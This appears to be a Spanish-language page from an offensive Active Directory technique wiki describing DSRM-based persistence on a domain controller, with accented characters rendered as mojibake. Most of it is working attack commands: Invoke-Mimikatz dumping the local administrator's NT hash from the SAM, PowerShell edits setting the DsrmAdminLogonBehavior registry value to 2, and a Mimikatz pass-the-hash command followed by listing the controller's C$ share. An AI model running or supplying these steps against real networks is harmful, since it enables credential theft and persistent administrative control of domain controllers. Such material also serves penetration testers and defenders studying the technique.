Directory Services Restore Mode (DSRM)

Descripci贸n

Existe un administrador local en cada controlador de dominio, cuya contrase帽a corresponde a la ingresada en la opci贸n de Directory Services Restore Mode (DSRM) al momento de instalar el servicio de Active Directory. Realizando una modificaci贸n al registro de Windows es posible activar dicha contrase帽a, para luego extraer su hash NT y acceder al controlador de dominio como administrador local utilizando Pass the Hash (PtH).

Invoke-Mimikatz

1) Obtenci贸n de hash NT del administrador local del controlador de dominio con Invoke-Mimikatz.

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <computer-name-DC>

2) Configuraci贸n de registro DsrmAdminLogonBehavior con valor 2.

# Comprobaci贸n si existe registro DsrmAdminLogonBehavior
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior

# Creaci贸n de registro DsrmAdminLogonBehavior y asignaci贸n de valor 2 si no existe
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD

# Actualizaci贸n de valor del registro DsrmAdminLogonBehavior a 2 si ya existe
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2

Pass the Hash (PtH) a controlador de dominio con sesi贸n de administrador local.

# Pass the Hash (PtH)
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<computer-name-DC> /user:Administrator /ntlm:<NT-hash-computer-DC> /run:powershell.exe"'

# Lectura de archivos
dir \\<computer-name-DC>\C$
AnteriorSkeleton KeySiguienteNoPac

脷ltima actualizaci贸n